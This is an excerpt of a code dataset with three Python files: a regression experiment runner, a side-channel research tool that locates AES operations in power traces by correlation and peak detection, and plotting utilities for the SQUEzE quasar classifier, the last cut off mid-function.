{}\".format(module, output_directory))\n\n # fit the regressor\n regressor = fit_regressor(output_directory, regressor_name, x_train, y_train, x_test, y_test, itr=itr)\n\n # start testing\n y_pred = regressor.predict(x_test)\n df_metrics = calculate_regression_metrics(y_test, y_pred)\n\n print(df_metrics)\n\n # save the outputs\n df_metrics.to_csv(output_directory + 'regression_experiment.csv', index=False)\n","repo_name":"ChangWeiTan/TS-Extrinsic-Regression","sub_path":"run_experiments.py","file_name":"run_experiments.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"72"} +{"seq_id":"31797502079","text":"#!/usr/bin/python3\n\n# sure imports\nimport numpy as np\nimport holoviews as hv\nfrom bokeh.plotting import figure, show\nfrom bokeh.io import output_notebook, reset_output\n\nfrom src.helper import _print, detrending_filter\nfrom src.autocorrelation_accl import Autocorrelation_Accelerator\n\n\nclass SampleFinder:\n def __init__(self, trace_container, top_x=10, do_plots=False, print_info=True, error_margin=0.02, exact_clk_cycles=None, allowed_sub_peak_delta=2):\n if(print_info):\n print(\"initialized the sample finder with \" + str(trace_container.nr_hidden_cos) +\n \" hidden aes cycles, sample rate of \" + str(trace_container.get_fs()))\n\n self.trace_container = trace_container\n\n if exact_clk_cycles == None:\n self.min_clk_cycles = max(\n 1, int(trace_container.known_width_clk_cycles*0.95))\n self.max_clk_cycles = max(\n self.min_clk_cycles+1, int(trace_container.known_width_clk_cycles*1.05))\n else:\n self.min_clk_cycles = exact_clk_cycles\n self.max_clk_cycles = exact_clk_cycles+1\n\n # is config of sample finder:\n self.store_for_latex = False\n self.top_x = top_x\n self.error_margin = error_margin\n self.print_info = print_info\n self.do_plots = do_plots\n self.dict_plots = None\n self.df_corr_for_each_width = None\n self.allowed_sub_peak_delta = allowed_sub_peak_delta\n\n self.correlation_dict = {}\n self.filtered_correlation_dict = {}\n self.mean_event_dicts = {}\n\n #\n def full_auto_find_COs(self, do_quality_plot=False, do_main_sub_peak_plot=False, sad_for_autocorr=False, sad_approach=True, avg_round_template=True, use_detrended=False):\n \"\"\"\n full_auto_find_COs Finds all COs in the trace in self.trace_container.\n\n :param do_quality_plot: If this is set, the similarity of step 1 will be plotted (takes a lot of time)\n :param do_main_sub_peak_plot: If this is set, the similarity of step 3 will be plotted. This is where the main-peaks and sub-peaks are.\n :param sad_for_autocorr: Calculates the round-similarity with SAD instead of the Pearson correlation\n :param sad_approach: Calculates the similarity of the found template candidate (through step 1) with SAD instead of the Pearson correlation\n :param avg_round_template: Instead of using the entire CO as a template, average all rounds, then concatenate them together\n :param use_detrended: Use a rolling average filter to detrend the similarity of the similarity in step 1\n :return: returns a triple with the best_fitting_width found, a list of starting indices that we found and the CO-Template candidate that we chose.\n \"\"\"\n f_device = self.trace_container.known_device_frequency\n self.trace_container.calculated_device_frequency = f_device\n samples_per_clock = self.trace_container.get_fs() / f_device\n print(\"samples per clock: \" + str(samples_per_clock))\n possible_widths = np.arange(samples_per_clock*self.min_clk_cycles,\n samples_per_clock*self.max_clk_cycles, step=samples_per_clock, dtype=int)\n print(\"possible widths (samples): \" + str(possible_widths))\n print(\"possible widths (cycles): \" +\n str(np.arange(self.min_clk_cycles, self.max_clk_cycles)))\n self.f_device = f_device\n\n # 2. Test all possible widths, find starting index that has best autocorreltaion\n from time import process_time\n t1_start = process_time()\n opencl_autocorr = Autocorrelation_Accelerator(self.trace_container.get_trace(\n ), self.trace_container.no_similar_rounds, self.top_x, do_plots=do_quality_plot, use_detrended=use_detrended, trace_container=self.trace_container)\n if sad_for_autocorr:\n best_widths, widths_correlation, correlation_for_each_width = opencl_autocorr.autosad_accelerated_updated(\n possible_widths)\n else:\n best_widths, widths_correlation, correlation_for_each_width = opencl_autocorr.autocorrelation_accelerated_updated(\n possible_widths)\n t1_stop = process_time()\n self.alg1_time_sec = t1_stop-t1_start\n if self.print_info:\n print(\"GPU: Finding best possible starting points used \" +\n str((t1_stop-t1_start)) + \" seconds\")\n print(best_widths)\n best_width = possible_widths[int(best_widths[0, 1])]\n starting_position = widths_correlation[int(\n best_widths[0, 1]), 0, 1]\n # print(best_widths)\n print(\"best_width = \" + str(best_width) + \" with correlation of: \" +\n str(best_widths[0, 0]) + \" at starting position: \" + str(starting_position))\n\n # 3. calculate best fitting width, utilizing the number of sub-peaks behind each main-peak.\n find_best_fitting_width_start = process_time()\n best_fitting_width, peak_idx_list, char_trace_template = self.get_best_fitting_width(\n best_widths, possible_widths, widths_correlation, f_device, sad_approach=sad_approach, avg_round_template=avg_round_template, allowed_sub_peak_delta=self.allowed_sub_peak_delta, do_plots=do_main_sub_peak_plot)\n find_best_fitting_width_end = process_time()\n self.alg2_time_sec = find_best_fitting_width_end-find_best_fitting_width_start\n if self.print_info:\n print(\"best fitting width is : \" + str(best_fitting_width))\n print(\"found on cpu using \" + str((find_best_fitting_width_end -\n find_best_fitting_width_start)) + \" seconds\")\n self.trace_container.calculated_start_idx_aes = peak_idx_list\n self.trace_container.calculated_width = best_fitting_width\n return (best_fitting_width, peak_idx_list, char_trace_template)\n\n def number_of_equidistant_peaks(self, x, distance, main_peak_idx=0, max_peaks=9, delta=1):\n number_of_peaks = 0\n max_idx = len(x)-1\n for sub_peak_idx in np.arange(distance, main_peak_idx+distance*max_peaks, step=distance):\n if(sub_peak_idx+2 * delta-1 > max_idx):\n return number_of_peaks\n #idx_is_peak = (x[sub_peak_idx]>x[sub_peak_idx+delta] and x[sub_peak_idx]>x[sub_peak_idx-delta] and (x[sub_peak_idx]<=x[main_peak_idx]))\n idx_is_peak = self.is_a_peak(x, sub_peak_idx, main_peak_idx, delta)\n if delta > 1:\n for idx in np.arange(sub_peak_idx-delta, sub_peak_idx+delta, step=1, dtype=int):\n if self.is_a_peak(x, idx, main_peak_idx, delta):\n idx_is_peak = self.is_a_peak(\n x, idx, main_peak_idx, delta)\n if idx_is_peak:\n number_of_peaks += 1\n else:\n return number_of_peaks\n return number_of_peaks\n\n def is_a_peak(self, x, idx, main_peak_idx, delta=1):\n return (x[idx] > x[idx+delta] and x[idx] > x[idx-delta] and (x[idx] <= x[main_peak_idx]))\n\n def find_peaks(self, correlation, w_segment, w_event, correlation_step_size, min_number_of_sub_peaks=8, no_rounds=64, max_num_peaks=5000, allowed_sub_peak_delta=2):\n if self.print_info:\n print(\"Finding main- and sub-peaks for width : \" +\n str(w_segment*correlation_step_size))\n correlation_orig = np.copy(correlation)\n correlation_removed_peaks = np.copy(correlation)\n peak_idx = []\n nr_of_peaks = 0\n\n for i in range(max_num_peaks):\n # find next main-peak at max_idx\n max_idx = np.argmax(correlation_removed_peaks)\n if(max_idx > len(correlation_orig)-w_event): # add 0 if we need them!\n correlation = np.concatenate(\n (correlation, np.zeros(w_event+1)))\n correlation_removed_peaks = np.concatenate(\n (correlation_removed_peaks, np.zeros(w_event+1)))\n correlation_orig = np.concatenate(\n (correlation_orig, np.zeros(w_event+1)))\n nr_of_peaks = self.number_of_equidistant_peaks(\n correlation_orig[max_idx:max_idx+w_event+2*allowed_sub_peak_delta], distance=w_segment, delta=allowed_sub_peak_delta, max_peaks=no_rounds)\n _print(\"nr_of_equidistant_peaks = \" +\n str(nr_of_peaks), print_info=\"debug\")\n\n if True: # if we want to check before peaks\n nr_of_peaks_before = self.number_of_equidistant_peaks(np.flip(correlation_orig[np.max(\n (max_idx-w_event-2*allowed_sub_peak_delta, 0)):max_idx+1]), distance=w_segment, delta=allowed_sub_peak_delta, max_peaks=no_rounds)\n _print(\"nr_of_equidistant_peaks_before = \" +\n str(nr_of_peaks_before), print_info=\"debug\")\n nr_of_peaks = (nr_of_peaks + nr_of_peaks_before)/2\n\n if nr_of_peaks < min_number_of_sub_peaks:\n # not enough sub peaks, probably no more aes in here! (at leas no well detectable aes cycles!)\n if self.print_info:\n print(\"We found \" + str(i) + \" peaks. Not enough sub-peaks for next main-peak at position: \" +\n str(max_idx*correlation_step_size))\n break\n\n peak_idx.append(max_idx*correlation_step_size)\n for i in range(max(0, max_idx-int(w_event*0.7)), min(len(correlation_removed_peaks), max_idx + int(w_event*0.7))):\n correlation_removed_peaks[i] = 0\n return peak_idx, nr_of_peaks\n\n # Evaluate certain best width:\n def get_peaks_for_width(self, f_device, width, starting_position, min_number_of_sub_peaks=8, do_plots=False, print_info=False, max_num_peaks=5000, new_chosen_mean_event=None, sad_approach=False, avg_round_template=True, allowed_sub_peak_delta=1):\n samples_per_clock = self.trace_container.get_fs()/f_device\n w = int(width)\n i = int(starting_position)\n # IDEA: starting position could be \"in the middle of a clock cycle\" => calculate offset! from 0\n start_offset = i % samples_per_clock\n correlation_step_size = min(w/4, samples_per_clock)\n if not w in self.correlation_dict:\n # we create a new characteristic trace from scratch at starting point i and correlate/sad it with everything!\n idx_list = np.arange(start_offset, len(self.trace_container.get_trace(\n ))-(self.trace_container.no_similar_rounds*w), step=correlation_step_size, dtype=int)\n # check bounds:\n if (i+w*self.trace_container.no_similar_rounds) > len(self.trace_container.get_trace()):\n return (-1, -1, -1)\n if avg_round_template:\n chosen_mean_segment = np.average([self.trace_container.get_trace(\n )[i+w*j:i+w*(j+1)] for j in range(self.trace_container.no_similar_rounds)], axis=0)\n chosen_mean_event = np.array([chosen_mean_segment for j in range(\n self.trace_container.no_similar_rounds)]).flatten()\n else:\n chosen_mean_event = self.trace_container.get_trace(\n )[i:i+w*self.trace_container.rounds_in_co_template]\n\n if not sad_approach:\n corrl_accl = Autocorrelation_Accelerator()\n all_correlation = corrl_accl.correlate(\n self.trace_container.get_trace(), chosen_mean_event, idx_list, opencl=True)\n\n filtered_correlation = detrending_filter(\n all_correlation, (w)/correlation_step_size)\n self.mean_event_dicts[w] = chosen_mean_event\n self.correlation_dict[w] = all_correlation\n self.filtered_correlation_dict[w] = filtered_correlation\n else:\n corrl_accl = Autocorrelation_Accelerator()\n self.mean_event_dicts[w] = chosen_mean_event\n sad_over_everything = np.array(corrl_accl.calc_sad(\n self.mean_event_dicts[w], self.trace_container.get_trace(), idx_list=idx_list))\n all_correlation = -1*sad_over_everything\n filtered_correlation = detrending_filter(\n all_correlation, (w)/correlation_step_size)\n self.correlation_dict[w] = all_correlation\n self.filtered_correlation_dict[w] = filtered_correlation\n if do_plots:\n reset_output()\n output_notebook()\n p = figure(width=900, height=600)\n x_range = range(0, len(self.trace_container.get_trace()))\n corr_plot_y = all_correlation * \\\n np.max(self.trace_container.get_trace())\n p.line(np.arange(0, len(self.trace_container.get_trace()), step=correlation_step_size)[\n :len(corr_plot_y)], corr_plot_y, color='black')\n filtered_corr_plot_y = filtered_correlation * \\\n np.max(self.trace_container.get_trace()) - \\\n np.max(self.trace_container.get_trace())\n p.line(np.arange(0, len(self.trace_container.get_trace()), step=correlation_step_size)[\n :len(filtered_corr_plot_y)], filtered_corr_plot_y, color='orange')\n show(p)\n else:\n filtered_correlation = self.filtered_correlation_dict[w]\n all_correlation = self.correlation_dict[w]\n chosen_mean_event = self.mean_event_dicts[w]\n\n peak_idx_list, least_peaks = self.find_peaks(filtered_correlation, int(w/correlation_step_size), int((self.trace_container.no_similar_rounds*w)/correlation_step_size),\n correlation_step_size, min_number_of_sub_peaks, max_num_peaks=max_num_peaks, allowed_sub_peak_delta=allowed_sub_peak_delta, no_rounds=self.trace_container.no_similar_rounds)\n peak_idx_list = (np.array(peak_idx_list))\n\n # remove overlapping peaks if they dont fit\n if(len(peak_idx_list) > self.trace_container.nr_hidden_cos):\n # here we check if the peaks that where added at last fit into the by then collected peaks. if they do, its not our case!\n min_peak = int(\n peak_idx_list[self.trace_container.nr_hidden_cos-1]/correlation_step_size)\n max_peak = int(peak_idx_list[0]/correlation_step_size)\n min_threshold = filtered_correlation[min_peak] - (\n filtered_correlation[max_peak] - filtered_correlation[min_peak])\n min_threshold = filtered_correlation[min_peak] - (\n filtered_correlation[max_peak] - filtered_correlation[min_peak])*2/self.trace_container.nr_hidden_cos\n for overlap_peak_idx in range(self.trace_container.nr_hidden_cos, len(peak_idx_list)):\n overlap_peak = peak_idx_list[overlap_peak_idx] / \\\n correlation_step_size\n #if self.print_info: print(\"hidden cycles = \"+ str(self.trace_container.nr_hidden_cos) +\"removed, peaklistlennow:\" + str(len(peak_idx_list)))\n if filtered_correlation[int(overlap_peak)] < min_threshold:\n # remove this point and because it does not belong here\n peak_idx_list = peak_idx_list[:overlap_peak_idx]\n if self.print_info:\n print(\"REMOVED last peaks because they are too low: hidden cycles = \" + str(\n self.trace_container.nr_hidden_cos) + \" peaklistlennow:\" + str(len(peak_idx_list)))\n break\n return (peak_idx_list, least_peaks, chosen_mean_event)\n\n # Evaluate certain best width:\n def get_best_fitting_width(self, best_widths, w_list, widths_correlation, f_device, sad_approach=False, avg_round_template=True, allowed_sub_peak_delta=1, do_plots=False):\n best_fitting_width = 0\n least_peaks_array = np.zeros(\n len(best_widths[:, 1]))+self.trace_container.no_similar_rounds\n peak_idx_list = []\n return_peak_idx_list = []\n\n chosen_mean_events = [np.zeros(int(best_widths[i, 1]))\n for i in range(len(best_widths[:, 1]))]\n for min_number_of_sub_peaks in np.arange(self.trace_container.no_similar_rounds-1, 1, step=-1, dtype=int):\n if self.print_info:\n print(\"Try with min number of \" +\n str(min_number_of_sub_peaks) + \" sub peaks for each CO!\")\n print(\"--------------------------------------------------------------------\")\n least_peaks_array_idx = 0\n for width_idx, idx in zip(best_widths[:, 1], range(len(best_widths[:, 1]))):\n # skip the ones that won't get new peaks this round:\n if least_peaks_array[least_peaks_array_idx] < min_number_of_sub_peaks:\n least_peaks_array_idx += 1\n continue\n width = w_list[int(width_idx)]\n starting_position = widths_correlation[int(width_idx), 0, 1]\n # Find number of main-peaks for this width with at least min_number_of_subpeaks:\n peak_idx_list, least_peaks_array[least_peaks_array_idx], chosen_mean_events[idx] = self.get_peaks_for_width(f_device, width, starting_position, min_number_of_sub_peaks=min_number_of_sub_peaks, do_plots=do_plots, max_num_peaks=(\n self.trace_container.nr_hidden_cos*2 + self.trace_container.nr_hidden_cos*allowed_sub_peak_delta), sad_approach=sad_approach, avg_round_template=avg_round_template, allowed_sub_peak_delta=allowed_sub_peak_delta)\n if least_peaks_array[least_peaks_array_idx] == -1:\n continue\n if(len(peak_idx_list) >= int(self.trace_container.nr_hidden_cos) and len(peak_idx_list) <= self.trace_container.nr_hidden_cos + int(self.trace_container.nr_hidden_cos*self.error_margin)): # Margin for error :)\n peak_idx_list = peak_idx_list[:self.trace_container.nr_hidden_cos]\n print(\"right number of COs for width of \" + str(width))\n if self.print_info:\n print(\"peaks: \")\n if self.print_info:\n print(peak_idx_list)\n best_fitting_width = width\n return_peak_idx_list = peak_idx_list\n first_index = int(starting_position)\n char_round_template = np.average([self.trace_container.get_trace(\n )[first_index+width*j:first_index+width*(j+1)] for j in range(self.trace_container.no_similar_rounds)], axis=0)\n char_trace_template = np.array([char_round_template for j in range(\n self.trace_container.no_similar_rounds)]).flatten()\n self.min_number_of_sub_peaks_needed = min_number_of_sub_peaks\n break\n if len(peak_idx_list) > self.trace_container.nr_hidden_cos + int(self.trace_container.nr_hidden_cos*self.error_margin):\n continue\n least_peaks_array_idx += 1\n if(best_fitting_width != 0):\n return best_fitting_width, return_peak_idx_list, char_trace_template\n return -1, -1, -1 # no fitting width found!\n\n def find_COs_with_template(self, template, do_plots=False, print_info=True, use_sad=True, no_decimation=True):\n corrl_accl = Autocorrelation_Accelerator()\n samples_per_clock = self.trace_container.get_fs(\n )/self.trace_container.calculated_device_frequency\n w = int(self.trace_container.calculated_width)\n if self.trace_container.calculated_start_idx_aes[0] != None:\n i = int(self.trace_container.calculated_start_idx_aes[0])\n # IDEA: starting position could be \"in the middle of a clock cycle\" => calculate offset! from 0\n start_offset = i % samples_per_clock\n correlation_step_size = min(w/2, samples_per_clock)\n else:\n start_offset = 0\n correlation_step_size = min(w/2, samples_per_clock)\n if no_decimation:\n correlation_step_size = 1\n idx_list = np.arange(start_offset, len(self.trace_container.get_trace(\n ))-len(template), step=correlation_step_size, dtype=int)\n if use_sad:\n correlation = np.array(corrl_accl.calc_sad(\n template, self.trace_container.get_trace(), idx_list))*-1\n else:\n correlation = corrl_accl.correlate(\n self.trace_container.get_trace(), template, idx_list, opencl=True)\n filtered_correlation = detrending_filter(\n correlation, (int(self.trace_container.calculated_width))/correlation_step_size)\n if do_plots:\n curve = hv.Curve((range(0, len(filtered_correlation)), np.array(\n filtered_correlation)), label=\"filtered correlation\")\n curve = curve.options(xlabel='Sample', ylabel='correlation')\n curve.opts(width=900, height=600)\n hv.extension('bokeh')\n # hv.save(curve,'test.svg',fmt='',backend='bokeh')\n p = hv.render(curve, backend='bokeh')\n show(p)\n peak_idx_list, peak_end_idx_list = self.get_peaks_above_threshold(\n filtered_correlation, correlation_step_size)\n\n return peak_idx_list\n\n def get_peaks_above_threshold(self, correlation, correlation_step_size, threshold=0):\n correlation_removed_peaks = np.copy(correlation)\n window_size = int(self.trace_container.calculated_width) * \\\n self.trace_container.no_similar_rounds\n\n peak_idx = []\n peak_end_idx = []\n num_peaks = self.trace_container.nr_hidden_cos\n\n for i in range(num_peaks):\n max_idx = np.argmax(correlation_removed_peaks)\n if correlation[max_idx] < threshold:\n break\n peak_idx.append(max_idx*correlation_step_size)\n peak_end_idx.append(max_idx*correlation_step_size+window_size)\n for i in range(max(0, max_idx-int(window_size/correlation_step_size*0.7)), min(len(correlation_removed_peaks), max_idx + int(window_size/correlation_step_size*0.7))):\n correlation_removed_peaks[i] = 0\n\n return np.array(peak_idx), np.array(peak_end_idx)\n","repo_name":"FAU-LS12-RC/Finding-COs-in-Side-Channel-Traces","sub_path":"src/sample_finder.py","file_name":"sample_finder.py","file_ext":"py","file_size_in_byte":22428,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"7956586219","text":"\"\"\"\n SQUEzE\n ======\n\n This file provides useful functions to plot the performance of SQUEzE\n \"\"\"\n__author__ = \"Ignasi Perez-Rafols (iprafols@gmail.com)\"\n\nimport re\nimport os\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib.collections import LineCollection\nimport numpy as np\nimport pandas as pd\n\nfrom squeze.utils import deserialize, load_json\n\nCOLOR_LIST = [\n '#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2'\n]\n\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nos.environ[\"THIS_DIR\"] = THIS_DIR\nSQUEZE = THIS_DIR.split(\"py/squeze\")[0]\nos.environ[\"SQUEZE\"] = SQUEZE\nLINES = deserialize(\n load_json(os.path.expandvars(\"$SQUEZE/data/default_lines.json\")))\n\n\ndef compare_performances_plot(stats_dict,\n names,\n labels,\n control_name,\n plot_f1=False,\n add_purity=False,\n add_completeness=False,\n sharey=True):\n \"\"\" Plot the f1-score as a function of magnitude of multiple runs of SQUEzE\n to compare them.\n\n Arguments\n ---------\n stats_dict: dictionary\n A dictionary with the statistics as a function of magnitude. Keys are the\n names of the different runs, values are the output of functon\n compute_stats_vs_mag (see stats_utils.py)\n\n names: list of str or str\n The keys in stats_dict that should be plotted. If a string, only one key is\n passed\n\n labels: list of str or str\n Labels for the runs. Must have the same ordering as names.\n\n control_name: str\n The name of the baseline run others are compared to. Must be a key in\n stats_dict.\n\n plot_f1: bool - Default: False\n If True then plot the overall f1-score along with the comparison. Otherwise\n just plot the comparison\n\n add_purity: bool - Default: False\n If True, then add a dashed line with the purity values\n\n add_completeness: bool - Default: False\n If True, then add a dotted line with the completeness values\n\n sharey: bool - Default: True\n If True, the plots at low-z and high-z will share the y axis\n\n Return\n ------\n fig: matplotlib.pyplot.figure\n The figure with the plot\n \"\"\"\n if not isinstance(names, list):\n names = [names]\n labels = [labels]\n\n if len(names) > len(COLOR_LIST):\n print(\"Too many items to plot. Either add more colors to the list or \"\n \"else remove some items to plot\")\n return\n\n # plot options\n if plot_f1:\n figsize = (10, 8)\n else:\n figsize = (10, 5)\n fontsize = 14\n labelsize = 13\n ticksize = 8\n tickwidth = 2\n pad = 6\n ncols = 2\n if plot_f1:\n nrows = 3\n height_ratios = [10, 5, 1]\n else:\n nrows = 2\n height_ratios = [10, 1]\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols, height_ratios=height_ratios)\n gs.update(wspace=0.25,\n hspace=0.4,\n bottom=0.15,\n left=0.1,\n right=0.95,\n top=0.9)\n if plot_f1:\n ax_lowz_f1 = fig.add_subplot(gs[0, 0])\n if sharey:\n ax_highz_f1 = fig.add_subplot(gs[0, 1], sharey=ax_lowz_f1)\n else:\n ax_highz_f1 = fig.add_subplot(gs[0, 1])\n lns_lowz_f1 = []\n lns_highz_f1 = []\n ax_lowz_diff = fig.add_subplot(gs[-2, 0])\n if sharey:\n ax_highz_diff = fig.add_subplot(gs[-2, 1], sharey=ax_lowz_diff)\n else:\n ax_highz_diff = fig.add_subplot(gs[-2, 1])\n lns_lowz_diff = []\n lns_highz_diff = []\n ax_legend = fig.add_subplot(gs[-1, :])\n\n for index, (name, label) in enumerate(zip(names, labels)):\n if plot_f1:\n lns_lowz_f1 += ax_lowz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n lns_highz_f1 += ax_highz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n control = stats_dict.get(control_name).get(\"f1_score_vs_mag\")\n lns_lowz_diff += ax_lowz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 0] - control[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n lns_highz_diff += ax_highz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"f1_score_vs_mag\")[:, 1] - control[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"solid\")\n\n if add_purity:\n if plot_f1:\n ax_lowz_f1.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\",\n alpha=0.5)\n ax_highz_f1.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:,\n 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\",\n alpha=0.5)\n control = stats_dict.get(control_name).get(\"purity_vs_mag\")\n ax_lowz_diff.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:, 0] -\n control[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\")\n ax_highz_diff.plot(stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"purity_vs_mag\")[:, 1] -\n control[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dashed\",\n alpha=0.5)\n\n if add_completeness:\n if plot_f1:\n ax_lowz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n ax_highz_f1.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n control = stats_dict.get(control_name).get(\"completeness_vs_mag\")\n ax_lowz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 0] -\n control[:, 0],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n ax_highz_diff.plot(\n stats_dict.get(name).get(\"mag_cuts\"),\n stats_dict.get(name).get(\"completeness_vs_mag\")[:, 1] -\n control[:, 1],\n label=label,\n color=COLOR_LIST[index],\n linestyle=\"dotted\",\n alpha=0.5)\n\n # axis settings, labels\n xlim = (min(stats_dict.get(names[0]).get(\"mag_cuts\")),\n max(stats_dict.get(names[0]).get(\"mag_cuts\")))\n if plot_f1:\n ax_lowz_f1.set_title(r\"$z < 2.1$\", fontsize=fontsize)\n ax_lowz_f1.set_ylabel(r\"$f_{1}$\", fontsize=fontsize)\n ax_lowz_f1.yaxis.set_major_locator(MultipleLocator(0.05))\n ax_lowz_f1.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_lowz_f1.set_xlim(xlim)\n\n ax_highz_f1.set_title(r\"$z \\geq 2.1$\", fontsize=fontsize)\n ax_highz_f1.yaxis.set_major_locator(MultipleLocator(0.05))\n ax_highz_f1.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_highz_f1.set_xlim(xlim)\n\n else:\n ax_lowz_diff.set_title(r\"$z < 2.1$\", fontsize=fontsize)\n ax_highz_diff.set_title(r\"$z \\geq 2.1$\", fontsize=fontsize)\n\n ax_lowz_diff.set_ylabel(r\"$f_{1} - f_{1} ({\\rm fid})$\", fontsize=fontsize)\n ax_lowz_diff.set_xlabel(\"r mag cut\", fontsize=fontsize)\n ax_lowz_diff.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_lowz_diff.set_xlim(xlim)\n\n ax_highz_diff.set_xlabel(\"r mag cut\", fontsize=fontsize)\n ax_highz_diff.tick_params(labelsize=labelsize,\n size=ticksize,\n width=tickwidth,\n pad=pad,\n left=True,\n right=False,\n labelleft=True,\n labelright=False)\n ax_highz_diff.set_xlim(xlim)\n\n # legend\n labels = [lns.get_label() for lns in lns_highz_diff]\n ax_legend.legend(lns_highz_diff, labels, ncol=3, loc=9, fontsize=fontsize)\n ax_legend.axis('off')\n\n\ndef confusion_line_plots(df,\n rmag_bins,\n prob_low=0.0,\n prob_high=0.0,\n lines=None,\n exclude_line_pairs=None,\n delta_z=0.15):\n \"\"\" Make a confusion line plot\n\n Plot only items with probability above a certain threshold.\n High-z quasars (z>=2.1) can be treated differently from low-z quasars.\n\n Arguments\n ---------\n df: pd.DataFrame\n The dataframe with the classifications\n\n rmag_bins: array of float\n Limiting magnitudes to split the plot. len(rmag_bins) -1 plot are\n created\n\n prob_low: float - Default: 0.0\n Probability threshold for low-z quasars (z < 2.1)\n\n prob_high: float - Default: 0.0\n Probability threshold for high-z quasars (z >= 2.1)\n\n lines: pd.DataFrame or None - Default: None\n Dataframe with the confusion lines to plot. It must contain column \"WAVE\".\n Indexs should be the names of the lines. Ignored if None\n\n exclude_line_pairs: list of (str, str) or None - Default: None\n List containing confusion lines that are not plotted.\n\n delta_z: float - Default: 0.15\n Maximum redshift error for correctly classified objects\n \"\"\"\n if exclude_line_pairs is None:\n exclude_line_pairs = []\n\n ncols = 2\n if len(rmag_bins) % 2 == 0:\n nrows = int((len(rmag_bins) - 1) // 2) + 1\n else:\n nrows = int((len(rmag_bins) - 1) // 2)\n\n # plot options\n figsize = (8 * nrows, 8 * ncols)\n fontsize = 16\n labelsize = 14\n ticksize = 8\n tickwidth = 2\n markersize = 20\n markersize2 = 30\n fig = plt.figure(figsize=figsize)\n gs = fig.add_gridspec(nrows=nrows, ncols=ncols)\n gs.update(wspace=0., hspace=0.2, bottom=0.15, left=0.1, right=0.95, top=0.9)\n\n row_index = 0\n col_index = 0\n for rmag_min, rmag_max in zip(rmag_bins[:-1], rmag_bins[1:]):\n\n aux = df[(df[\"R_MAG\"] > rmag_min) & (df[\"R_MAG\"] <= rmag_max)]\n ax = fig.add_subplot(gs[row_index, col_index])\n ax.set_aspect('equal')\n\n ax.scatter(aux[(aux[\"IS_CORRECT\"])][\"Z_TRUE\"],\n aux[aux[\"IS_CORRECT\"]][\"Z_TRY\"],\n c='k',\n label=\"correct\",\n zorder=4,\n s=markersize)\n ax.scatter(\n aux[(aux[\"CLASS_PERSON\"] == 3) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRUE\"],\n aux[(aux[\"CLASS_PERSON\"] == 3) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRY\"],\n label=\"qso\",\n zorder=1,\n marker=\"v\",\n s=markersize)\n ax.scatter(\n aux[(aux[\"CLASS_PERSON\"] == 4) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRUE\"],\n aux[(aux[\"CLASS_PERSON\"] == 4) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 2.1) & (aux[\"PROB\"] > prob_low)))][\"Z_TRY\"],\n label=\"galaxy\",\n zorder=2,\n marker=\"^\",\n s=markersize)\n ax.scatter(\n aux[(aux[\"CLASS_PERSON\"] == 1) &\n (((aux[\"Z_TRY\"] >= 2.1) & (aux[\"PROB\"] > prob_high)) |\n ((aux[\"Z_TRY\"] < 